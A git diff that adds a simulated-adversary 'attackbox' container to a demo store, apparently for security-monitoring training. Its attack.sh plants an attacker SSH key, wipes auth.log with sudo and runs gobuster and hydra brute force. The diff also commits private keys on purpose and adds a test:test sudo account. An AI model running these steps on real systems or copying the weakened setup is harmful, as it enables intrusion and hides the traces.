diff --git a/.env.template b/.env.template
index 25323a33..76808e88 100644
--- a/.env.template
+++ b/.env.template
@@ -3,4 +3,12 @@ DISCOUNTS_PORT=2814
 AUTH_PORT=7578
 POSTGRES_USER=postgres
 POSTGRES_PASSWORD=postgres
-DD_API_KEY=
\ No newline at end of file
+DD_API_KEY=
+ATTACK_SSH=0
+ATTACK_GOBUSTER=0
+ATTACK_HYDRA=0
+ATTACK_HOST=nginx
+ATTACK_PORT=80
+ATTACK_SSH_INTERVAL=0
+ATTACK_GOBUSTER_INTERVAL=0
+ATTACK_HYDRA_INTERVAL=0
\ No newline at end of file
diff --git a/.github/workflows/attackbox.yml b/.github/workflows/attackbox.yml
new file mode 100644
index 00000000..ae391e87
--- /dev/null
+++ b/.github/workflows/attackbox.yml
@@ -0,0 +1,50 @@
+name: Attackbox
+
+on:
+  push:
+    branches: [ main ]
+    paths:
+      - services/attackbox/**
+  workflow_dispatch:
+    branches: [ main ]
+
+defaults:
+  run:
+    working-directory: attackbox
+
+jobs:
+
+  build:
+
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout
+      uses: actions/checkout@v2
+
+    - name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v1
+
+    - name: Configure AWS credentials
+      uses: aws-actions/configure-aws-credentials@v1
+      with:
+        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
+        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+        aws-region: us-east-1
+
+    - name: Login to ECR
+      id: login-ecr
+      uses: docker/login-action@v1
+      with:
+        registry: public.ecr.aws
+        username: ${{ secrets.AWS_ACCESS_KEY_ID }}
+        password: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+
+    - name: Build and push
+      uses: docker/build-push-action@v2
+      with:
+        context: ./services/attackbox
+        platforms: linux/amd64
+        push: true
+        tags: ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/attackbox:latest
+
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 098dba34..2303e61d 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -39,6 +39,7 @@ jobs:
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/backend
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/discounts
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/ads
+            ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/attackbox
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/auth
           )
 
diff --git a/docker-compose.yml b/docker-compose.yml
index 3d199edd..b8ccbd1a 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -103,12 +103,11 @@ services:
       - DD_APPSEC_ENABLED=true
     build:
       context: ./services/discounts
-    command: flask run --port=${DISCOUNTS_PORT} --host=0.0.0.0 # If using any other port besides the default 8282, overriding the CMD is required
     volumes:
       - "./services/discounts:/app"
     ports:
       - "${DISCOUNTS_PORT}:${DISCOUNTS_PORT}"
-      - "22"
+      - "22:22"
     networks:
       - storedog-net
   auth:
@@ -154,6 +153,25 @@ services:
       - /sys/fs/cgroup/:/host/sys/fs/cgroup:ro
     networks:
       - storedog-net
+  attackbox:
+    build:
+      context: ./services/attackbox
+    profiles:
+      - attackbox
+    environment:
+      - ATTACK_GOBUSTER
+      - ATTACK_HYDRA
+      - ATTACK_GOBUSTER_INTERVAL
+      - ATTACK_HYDRA_INTERVAL
+      - ATTACK_SSH
+      - ATTACK_SSH_INTERVAL
+      - ATTACK_HOST
+      - ATTACK_PORT
+    networks:
+      - storedog-net
+    depends_on:
+      - web
+      - discounts
 
 volumes:
   redis:
diff --git a/services/attackbox/.dockerignore b/services/attackbox/.dockerignore
new file mode 100644
index 00000000..c244720b
--- /dev/null
+++ b/services/attackbox/.dockerignore
@@ -0,0 +1,2 @@
+Dockerfile*
+.dockerignore
\ No newline at end of file
diff --git a/services/attackbox/Dockerfile b/services/attackbox/Dockerfile
new file mode 100644
index 00000000..6b15716c
--- /dev/null
+++ b/services/attackbox/Dockerfile
@@ -0,0 +1,43 @@
+FROM kalilinux/kali-rolling:latest
+RUN mkdir /app
+
+ADD https://github.com/OJ/gobuster/releases/download/v3.1.0/gobuster-linux-amd64.7z /app
+ADD https://github.com/vanhauser-thc/thc-hydra/archive/refs/tags/v9.3.zip /app
+
+# Install packages
+RUN export DEBIAN_FRONTEND=noninteractive && \
+    apt-get update && \
+    apt-get upgrade --yes && \
+    apt-get install --yes libssl-dev libssh-dev libidn11-dev libpcre3-dev \
+                 libgtk2.0-dev libmariadb-dev libpq-dev libsvn-dev \
+                 firebird-dev libmemcached-dev libgpg-error-dev \
+                 libgcrypt20-dev  openssh-client iputils-ping wordlists \
+                 build-essential libpq-dev p7zip unzip jq && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/*
+
+# Create user and ssh dir
+RUN useradd -m user
+RUN mkdir -p /home/user/.ssh
+COPY keys/storedog-leaked-key /home/user/.ssh/id_rsa
+
+# Install gobuster and hydra
+WORKDIR /app
+RUN gzip -d /usr/share/wordlists/rockyou.txt.gz
+RUN 7zr e ./gobuster-linux-amd64.7z && chmod +x gobuster
+RUN unzip v9.3.zip && cd thc-hydra-9.3/ && ./configure && make && make install
+
+# Copy attack script and keys
+COPY . .
+
+# Update permissions so ssh keys can be accessed outside sudo user
+RUN chown -R user:user /home/user/.ssh
+RUN chmod +x attack.sh
+RUN chown -R user ./keys
+
+# Switch back to new user so we can SSH properly
+USER user
+RUN chmod 400 /home/user/.ssh/id_rsa
+RUN chmod 400 ./keys/attacker-key
+
+CMD [ "./attack.sh"]
\ No newline at end of file
diff --git a/services/attackbox/README.md b/services/attackbox/README.md
new file mode 100644
index 00000000..652833fd
--- /dev/null
+++ b/services/attackbox/README.md
@@ -0,0 +1,32 @@
+# Attack Box
+
+This is a container that simulates an adversary attempting to hack the online store.
+
+The script has 3 stages:
+1) Malicious SSH configuration
+2) Gobuster
+3) Hydra
+
+## Deployment
+
+The attack box is configurable via environment variables found in the `.env` file.
+- **ATTACK_SSH**: Set to `1` to run the SSH attack script against the discounts container
+- **ATTACK_GOBUSTER**: Set to `1` to run the Gobuster tool for crawling directories on the container specified in `ATTACK_HOST`
+- **ATTACK_HYDRA**: Set to `1` to run the Hydra tool for brute force login
+- **ATTACK_SSH_INTERVAL**: Number of seconds between SSH attack invocations (if ommited, SSH attack will run once)
+- **ATTACK_GOBUSTER_INTERVAL**: Number of seconds between GOBUSTER invocations (if ommited, GOBUSTER will run once)
+- **ATTACK_HYDRA_INTERVAL**: Number of seconds between HYDRA invocations (if ommited, HYDRA will run once)
+- **ATTACK_PORT**: The web port you want to run the attacks against for hydra and dirbuster.
+- **ATTACK_HOST**: The web host that hydra and dirbuster will attack. ( Probably frontend or nginx )
+
+For example, if you wanted to run Gobuster every 60 seconds and Hydra ever 90 seconds, your `.env` file would look like this:
+```
+ATTACK_GOBUSTER=1
+ATTACK_GOBUSTER_INTERVAL=60
+ATTACK_HYDRA=1
+ATTACK_HYDRA_INTERVAL=90
+```
+## How to start the  attackbox service
+1. `cp .env.template .env`
+2. Set the attack config variables as explained above
+3. Run `docker compose --profile attackbox up `
\ No newline at end of file
diff --git a/services/attackbox/attack.sh b/services/attackbox/attack.sh
new file mode 100644
index 00000000..7e0f6ecb
--- /dev/null
+++ b/services/attackbox/attack.sh
@@ -0,0 +1,70 @@
+#!/bin/bash
+
+function ssh_attack()
+{
+# attempt to copy attacker key to discounts
+scp -o StrictHostKeyChecking=no ./keys/attacker-key.pub test@discounts:/home/test/.ssh
+
+# attempt to update authorized_keys to have attacker key
+ssh -o StrictHostKeyChecking=no test@discounts /bin/bash <<EOT
+cat /home/test/.ssh/attacker-key.pub >> /home/test/.ssh/authorized_keys
+exit
+EOT
+
+# attempt to clear log file and zero out unallocated disk space
+ssh -o StrictHostKeyChecking=no -i ./keys/attacker-key test@discounts /bin/bash <<EOT
+echo "test" | sudo -S cp /dev/null /var/log/auth.log
+echo "test" | sudo -S dd if=/dev/zero of=tempfile bs=1000000 count=10
+exit
+EOT
+}
+
+if [ "${ATTACK_SSH}" = 1 ];
+then
+  if [[ -z "${ATTACK_SSH_INTERVAL}" ]]
+    then
+      # run single invocation
+      ssh_attack
+    else
+      # run in a loop
+      while true
+      do
+          ssh_attack
+          sleep $ATTACK_SSH_INTERVAL
+      done &
+  fi
+fi
+
+# Add extra sleep to give frontend time to spin up (docker compose dependency is not enough)
+sleep 15
+
+if [ "${ATTACK_GOBUSTER}" = 1 ];
+then
+  if [[ -z "${ATTACK_GOBUSTER_INTERVAL}" ]]
+    then
+      ./gobuster dir -u http://${ATTACK_HOST}:${ATTACK_PORT} -w /usr/share/wordlists/rockyou.txt
+    else
+      while true
+      do
+          ./gobuster dir -u http://${ATTACK_HOST}:${ATTACK_PORT} -w /usr/share/wordlists/rockyou.txt
+          sleep $ATTACK_GOBUSTER_INTERVAL
+      done &
+  fi
+fi
+
+if [ "${ATTACK_HYDRA}" = 1 ];
+then
+  if [[ -z "${ATTACK_HYDRA_INTERVAL}" ]]
+    then
+      hydra -l admin@storedog.com -P /usr/share/wordlists/rockyou.txt -s ${ATTACK_PORT} ${ATTACK_HOST} http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+    else
+      while true
+      do
+          hydra -l admin@storedog.com -P /usr/share/wordlists/rockyou.txt -s ${ATTACK_PORT} ${ATTACK_HOST} http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+          sleep $ATTACK_HYDRA_INTERVAL
+      done
+  fi
+fi
+
+# keep container alive
+sleep infinity
\ No newline at end of file
diff --git a/services/attackbox/keys/README.md b/services/attackbox/keys/README.md
new file mode 100644
index 00000000..58b13f1d
--- /dev/null
+++ b/services/attackbox/keys/README.md
@@ -0,0 +1,3 @@
+### Attention
+
+These keys are used for training purposes and were **intentionally** added to this repository. These keys are self-contained within the docker images. They do not reside in any other external server. Please do not flag for security purposes and/or a bug bounty program.
\ No newline at end of file
diff --git a/services/attackbox/keys/attacker-key b/services/attackbox/keys/attacker-key
new file mode 100644
index 00000000..157b5d3c
--- /dev/null
+++ b/services/attackbox/keys/attacker-key
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/services/attackbox/keys/attacker-key.pub b/services/attackbox/keys/attacker-key.pub
new file mode 100644
index 00000000..98a6278c
--- /dev/null
+++ b/services/attackbox/keys/attacker-key.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDT/u93T4U6ALDVKIF5t5n8FZ8FgaJ/rww3Yf+HBkfHI7LcA9McomQOzv2T0665EWosmmluT+JpwEnXNoZpJg4sdJSF2PFqlgrZl9mbyhsoxl3wVTUvFZb5yyw2nZdSbRx3OtmzBnOkPr25+btpx1wN6Tlvw3Yoc3Ewx4GVX1dkg3xRtVj42d6oeYWY9D3Y6+KmUBPcns2stU4cUzJy4RLtsW6Kvbwg0A9iPO06fhFZxHtmvl58m/rUzomeyUYSvHeGJyBO1fX/IFDNH27mky2Vsoc8Y6HA3m3fqPcvIrRYXc8q4T63ho4wVlTlENyZhz8c4x631fPqvR1iPvRGuDiTf8rzYQh0eayeitepS8RFAts7Q8o+6EswA7u33l5mJoCp2bw1Pr5/TIPszB0tg1tFzmDuejD4EXYTINFwlkiUP9PEtPAtHJtQe1dI9mTK3wW8t6XO1nBODTSeK292a6chMNwn7Hi9N3KWooYyxZZYRZZKat7ISfH02rfeiT6pchE= colin.cole@COMP-C02CD0UULVDN
diff --git a/services/attackbox/keys/storedog-leaked-key b/services/attackbox/keys/storedog-leaked-key
new file mode 100644
index 00000000..6dcfe649
--- /dev/null
+++ b/services/attackbox/keys/storedog-leaked-key
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/services/discounts/Dockerfile b/services/discounts/Dockerfile
index 4b6e4b43..3a2fcad8 100644
--- a/services/discounts/Dockerfile
+++ b/services/discounts/Dockerfile
@@ -8,20 +8,41 @@ FROM python:3.9.6-slim-buster
 RUN export DEBIAN_FRONTEND=noninteractive && \
     apt-get update && \
     apt-get upgrade --yes && \
-    apt-get install --yes build-essential libpq-dev && \
+    apt-get install --yes build-essential libpq-dev openssh-server sudo dumb-init rsyslog && \
     apt-get clean && \
     rm -rf /var/lib/apt/lists/*
 
-# Copy over app
+# Setup for attack scenario
+RUN useradd -rm -g root -G sudo test 
+RUN  echo 'test:test' | chpasswd
+USER test
+
+# Bring in app
 WORKDIR /app
 COPY . .
 
-# Install dependencies via pip and avoid caching build artifacts
-RUN pip install --no-cache-dir -r requirements.txt
+# Create SSH config for attack scenario
+RUN mkdir -p /home/test/.ssh
+COPY keys/storedog-leaked-key.pub /home/test/.ssh
+RUN touch /home/test/.ssh/authorized_keys
+RUN cat /home/test/.ssh/storedog-leaked-key.pub >> /home/test/.ssh/authorized_keys
 
+USER root
 # Let Flask know what to boot
 ENV FLASK_APP=discounts.py
 
-# Start the app using ddtrace so we have profiling and tracing
-ENTRYPOINT ["ddtrace-run"]
-CMD flask run --port=8282 --host=0.0.0.0
+# Install dependencies via pip and avoid caching build artifacts
+RUN pip install --no-cache-dir -r requirements.txt
+RUN chmod +x ./my-wrapper-script.sh
+
+# Pass in Port mapping (default to 8282)
+ARG DISCOUNTS_PORT=8282
+# Because CMD is a runtime instruction, we have to create an additional ENV var that reads the ARG val
+# Only ENV vars are accessible via CMD
+ENV DISCOUNTS_PORT ${DISCOUNTS_PORT}
+
+# required to get logs out of the container
+ENTRYPOINT ["/usr/bin/dumb-init", "--"]
+
+# runs sshd and flask server
+CMD ./my-wrapper-script.sh ${DISCOUNTS_PORT}
diff --git a/services/discounts/keys/README.md b/services/discounts/keys/README.md
new file mode 100644
index 00000000..6153ae3b
--- /dev/null
+++ b/services/discounts/keys/README.md
@@ -0,0 +1,3 @@
+### Attention
+
+These keys are used for training purposes and were **intentionally** added to this repository. These keys are self-contained within the docker images used by `deploy/docker-compose-fixed-instrumented-attack.yml`. They do not reside in any other external server. Please do not flag for security purposes and/or a bug bounty program.
\ No newline at end of file
diff --git a/services/discounts/keys/storedog-leaked-key.pub b/services/discounts/keys/storedog-leaked-key.pub
new file mode 100644
index 00000000..b8784d31
--- /dev/null
+++ b/services/discounts/keys/storedog-leaked-key.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDUXq470vMlwLcCrG7BvwpE7eJQSY6dFpRMS7wHhIBECkD2w/ej2oXLA7lj5Go+A4oWEjXytNwBE7NwdMKGM5yHfaWp8zg7sqeDmx8ODrlW4shDPFBzqxP3XLZ7svYjcFqKDNpsKH74a+uk0wRGuVMWzjmednSAokGsPz84lmnHhuwKRaeVL99MteBeBD23youq9nrI7XmCZZ1wGsuN8yEUBOp3vl8dlD3PBXYCYguFIdnVufvQ0WuzKeayK/dbbi9moxVAHG7pRF7V8MMKyP2ySVV9/FcFNLTETCJLl7RKQCFhyMcUZ03Ehx3j4is7VCceMzJz49Mey2vgIR7YsQSLEiTSdCvGvnYyWZqYkTSSA4ObRV0ifSzyVcfouzP8QvD4YWHDSRjac4lI++Jo+/HdGnHQ6YA0cMlu7Px6Mje65TMcFq8EiwIk552fEem4sLG65h6OKAqQIt+qnBnN2tmKMxe/bqHOECzasyVREkiWCxqzUNt14dUmhqve/K4dXLk= colin.cole@COMP-C02CD0UULVDN
diff --git a/services/discounts/my-wrapper-script.sh b/services/discounts/my-wrapper-script.sh
new file mode 100755
index 00000000..e3f7a300
--- /dev/null
+++ b/services/discounts/my-wrapper-script.sh
@@ -0,0 +1,35 @@
+#!/bin/bash
+
+# Start the first process
+service ssh start && service rsyslog start && ln -sf /proc/1/fd/1 /var/log/auth.log
+status=$?
+if [ $status -ne 0 ]; then
+  echo "Failed to start my_first_process: $status"
+  exit $status
+fi
+
+# Start the second process
+ddtrace-run flask run --port=$1 --host=0.0.0.0
+status=$?
+if [ $status -ne 0 ]; then
+  echo "Failed to start my_second_process: $status"
+  exit $status
+fi
+
+# Naive check runs checks once a minute to see if either of the processes exited.
+# This illustrates part of the heavy lifting you need to do if you want to run
+# more than one service in a container. The container exits with an error
+# if it detects that either of the processes has exited.
+# Otherwise it loops forever, waking up every 60 seconds
+while sleep 60; do
+  ps aux |grep my_first_process |grep -q -v grep
+  PROCESS_1_STATUS=$?
+  ps aux |grep my_second_process |grep -q -v grep
+  PROCESS_2_STATUS=$?
+  # If the greps above find anything, they exit with 0 status
+  # If they are not both 0, then something is wrong
+  if [ $PROCESS_1_STATUS -ne 0 -o $PROCESS_2_STATUS -ne 0 ]; then
+    echo "One of the processes has already exited."
+    exit 1
+  fi
+done
\ No newline at end of file